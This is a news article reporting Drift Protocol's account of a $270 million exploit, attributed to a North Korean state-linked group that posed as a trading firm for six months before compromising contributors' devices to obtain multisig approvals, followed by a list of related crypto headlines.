Drift says $270 million exploit was a six-month North Korean intelligence operation

Attackers posed as a trading firm, met Drift contributors in person across multiple countries, deposited $1 million of their own capital, and waited half a year before executing the drain CoinDesk detailed earlier this week.

What to know:

• A North Korean state-linked group spent roughly six months infiltrating Drift Protocol under the guise of a quantitative trading firm before executing a $270 million exploit on April 1.
• The attackers built trust by meeting Drift contributors at conferences, depositing more than $1 million, and integrating an Ecosystem Vault, then compromised devices via a malicious TestFlight app and a VSCode/Cursor vulnerability to obtain multisig approvals.
• Investigators attributed the attack to UNC4736, also known as AppleJeus or Citrine Sleet, and Drift warned that such long-con, identity-rich operations expose deep weaknesses in multisig-based security models across DeFi.

A six-month intelligence operation preceded the $270 million exploit of Drift Protocol and was carried out by a North Korean state-affiliated group, according to a detailed incident update published by the team earlier on Sunday.

The attackers first made contact around fall 2025 at a major crypto conference, presenting themselves as a quantitative trading firm looking to integrate with Drift.

They were technically fluent, had verifiable professional backgrounds, and understood how the protocol operated, Drift said. A Telegram group was established and what followed were months of substantive conversations around trading strategies and vault integrations, interactions that are standard for how trading firms onboard with DeFi protocols.

Between December 2025 and January 2026, the group onboarded an Ecosystem Vault on Drift, held multiple working sessions with contributors, deposited over $1 million of their own capital, and built a functioning operational presence inside the ecosystem.

Drift contributors met individuals from the group face to face at multiple major industry conferences across several countries through February and March. By the time the attack launched on April 1, the relationship was nearly half a year old.

The compromise appears to have come through two vectors.

A second downloaded a TestFlight application, Apple's platform for distributing pre-release apps that bypasses App Store security review, which the group presented as their wallet product.

For the repository vector, Drift pointed to a known vulnerability in VSCode and Cursor, two of the most widely used code editors in software development, that the security community had been flagging since late 2025, where simply opening a file or folder in the editor was sufficient to silently execute arbitrary code with no prompt or warning of any kind.

Once devices were compromised, the attackers had what they needed to obtain the two multisig approvals that enabled the durable nonce attack CoinDesk detailed earlier this week. Those pre-signed transactions sat dormant for more than a week before being executed on April 1, draining $270 million from the protocol's vaults in under a minute.

The attribution points to UNC4736, a North Korean state-affiliated group also tracked as AppleJeus or Citrine Sleet, based on both on-chain fund flows tracing back to the Radiant Capital attackers and operational overlap with known DPRK-linked personas.

The individuals who appeared in person at conferences were not North Korean nationals, however. DPRK threat actors at this level are known to deploy third-party intermediaries with fully constructed identities, employment histories, and professional networks built to withstand due diligence.

Drift urged other protocols to audit access controls and treat every device touching a multisig as a potential target. The broader implication is uncomfortable for an industry that relies on multisig governance as its primary security model.

But if attackers are willing to spend six months and a million dollars building a legitimate presence inside an ecosystem, meet teams in person, contribute real capital, and wait, the question is what security model is designed to catch that.

More For You

Most crypto privacy models weaken as blockchain data grows. Encryption-based models like Zcash strengthen. CoinDesk Research maps the five privacy approaches and examines the widening gap.

Why it matters:

As blockchain adoption scales, the metadata available to machine learning models scales with it. Obfuscation-based privacy approaches are structurally degrading as a result. This report provides a comprehensive comparison of all five major crypto privacy architectures and a framework for evaluating which models remain durable as AI capabilities improve.

More For You

Social sentiment, on-chain data, and positioning metrics all hit extremes not seen since late February, even as institutional buying remains elevated.

What to know:

• Bitcoin is trading around $67,100 and has held in a $65,000 to $73,000 range despite the most negative social media sentiment since late February and an extreme fear reading on the Fear and Greed Index.
• Institutional demand, including record March ETF inflows and new approval for a low-fee Morgan Stanley...

Ant Group’s blockchain arm unveils platform for AI agents to transact on crypto rails

1 hour ago

Bitcoin holds steady as sentiment hits worst levels since Iran war began

1 hour ago

Bitcoin's $1.3 trillion security race: Key initiatives aimed at quantum-proofing the world's largest blockchain

9 hours ago

Bitcoin tends to outperform gold and stocks after global shocks, Mercado Bitcoin finds

18 hours ago

Ex-UK Chancellor backs bitcoin as alternative to failing systems

19 hours ago

Digital asset treasuries must now earn their keep

20 hours ago

Traders are the big winners as 24/7 stocks will finally end the after-hours price 'manipulation'

23 hours ago

Here's what 'cracking' bitcoin in 9 minutes by quantum computers actually means

Apr 4, 2026

Solana's quantum-threat readiness reveals harsh tradeoff: security vs speed

Apr 4, 2026

Schwab plans spot bitcoin, ether trading launch in first half of 2026

Apr 3, 2026

Circle under fire after $285 million Drift hack over inaction to freeze stolen USDC

Apr 3, 2026

Judge continues Nevada ban on Kalshi sports markets

Apr 4, 2026